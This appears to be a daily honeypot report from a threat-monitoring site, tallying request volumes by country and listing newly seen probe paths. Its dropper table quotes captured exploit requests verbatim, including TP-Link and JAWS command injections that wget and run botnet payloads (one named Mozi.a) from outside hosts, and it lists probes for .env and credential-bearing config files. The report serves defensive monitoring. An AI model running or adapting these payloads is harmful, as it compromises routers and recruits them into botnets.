Skip to main content
  1. Daily-Posts/

Report: 2025-05-07

·387 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-05-07
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 3 stage 1 IP address(es), linked to 2 dropper URL(s).

There are 22 new requests that have never been observed before (these were added to the monitored request database.).

A total of 1046 requests were recorded during the day, originating from 3 different countries, with a peak of 211 requests coming from US.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
USGermany
USGermany
USGermany
USDubai

botnet_dropper_behaviour
#

remote_addrrequest
45.95.147.209GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+sh%3B+wget+http%3A%2F%2F212.81.47.226%2Fsh%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+sh%60) HTTP/1.1
141.98.11.128GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+sh%3B+wget+http%3A%2F%2F212.81.47.226%2Fsh%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+sh%60) HTTP/1.1
59.97.213.76GET /shell?cd+/tmp;rm+-rf+*;wget+http://59.97.213.76:54224/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
1261GET /OdinHttpCall1746612224 HTTP/1.1
1271GET /odinhttpcall1746612224 HTTP/1.1
1311GET /hRXK HTTP/1.1
1321GET /9aqQ HTTP/1.1
1951GET /route/.env HTTP/1.1
2251GET /config/env.js HTTP/1.1
2261GET /config/runtime-env.js HTTP/1.1
2361GET /.env.suspected HTTP/1.1
2421GET /message-api/actuator/env HTTP/1.1
2471POST /login.cgi/cgi_main.cgi HTTP/1.1
2531GET /configuration.yml HTTP/1.1
2541GET /TYJe HTTP/1.1
2551GET /cCNi HTTP/1.1
2881GET /odinhttpcall1746618587 HTTP/1.1
2891GET /OdinHttpCall1746618587 HTTP/1.1
2901GET /Odin/http/call1746618587 HTTP/1.1
3271GET /dYKT HTTP/1.1
3281GET /Ax7m HTTP/1.1
3791GET /OdinHttpCall1746598718 HTTP/1.1
3811GET /Odin/http/call1746612224 HTTP/1.1
4031GET /odinhttpcall1746598718 HTTP/1.1
4041GET /Odin/http/call1746598718 HTTP/1.1

country_iso_code
#

number_of_occurencecountry_iso_code
0211US
1182NL
2157SC
3124GB
4117DE
545PL
627CN
722RU
818IL
915FR
1012IN
1112CA
1212AZ
1312LT
1410GH
158SG
167UA
176MD
186KR
195PT
204HK
214AO
224BE
234AU
243JP
253ZA
262SE
272IT
282ID
292BR
302CH
312RO
322NZ
331TR
341TW

Related

Report: 2025-05-06
·1021 words
Repport Daily
Report: 2025-05-05
·284 words
Repport Daily
Report: 2025-05-04
·471 words
Repport Daily